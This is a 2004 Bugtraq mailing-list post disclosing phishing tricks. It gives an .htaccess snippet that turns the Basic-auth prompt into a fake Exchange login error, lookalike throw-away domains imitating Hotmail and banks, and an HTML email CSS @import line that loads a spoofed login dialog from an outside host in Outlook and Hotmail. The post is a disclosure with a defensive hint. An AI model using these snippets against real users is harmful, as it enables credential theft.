[35001] in bugtraq
Stupid Phishing Tricks
daemon@ATHENA.MIT.EDU (http-equiv@excite.com)
Fri May 21 16:34:01 2004
Message-Id: <200405211346.i4LDkl3W022607@web125.megawebservers.com>
To: <bugtraq@securityfocus.com>
Date: Fri, 21 May 2004 13:46:47 -0000
From: "http-equiv@excite.com" <1@malware.com>
Cc: <NTBugtraq@listserv.ntbugtraq.com>
Reply-To: 1@malware.com
Phriday , May 21, 2004
Several pheeble yet interesting phishing possibilities arise as
phollows:
Take one .htaccess trivially modified to suit the target
scenario:
AuthName "EXCHANGE SERVER LOGIN ERROR: PLEASE TRY AGAIN"
AuthType Basic
One throw-away domain which can include the target's host name:
http://www.hotmail.hackerguy.nickelandimehosting.com
http://www.evenlargerbank.money.nickelandimehosting.com
http://www.bloatedcorp.lackey.nickelandimehosting.com
A couple of ridiculous email contraptions:
<STYLE type=text/css>
@import url( http://www.malware.com/pheesh );
</STYLE>
1. Outlook Express
[screen shot http://www.malware.com/phool.png 56KB]
2. Outlook 2003
[screen shot: http://www.malware.com/ohlook.png 39KB]
note: the above 'style sheet' works on outbound [reply to] [so
much for not downloading external content] inbound can be
achieved as well via http://securityfocus.com/bid/10369 which
has an even more convincing network login applet
3. Hotmail
[screen shot: http://www.malware.com/goturmail.png 91KB]
hint : hotmail[and other] web designer people; off-set the html
login form on the site as many prime banks have done.
The possibilities are obviously endless.
BE AWARE OF THE SHARKS OUT THERE
NB: anyone have any contact or connection to the upper
management security or abuse dept. of one public company called:
SAVVIS Communications. http://savvis.net/ it appears their abuse
dept. is woefully negligent in attending to abuse affairs.
End Call
--
http://www.malware.com
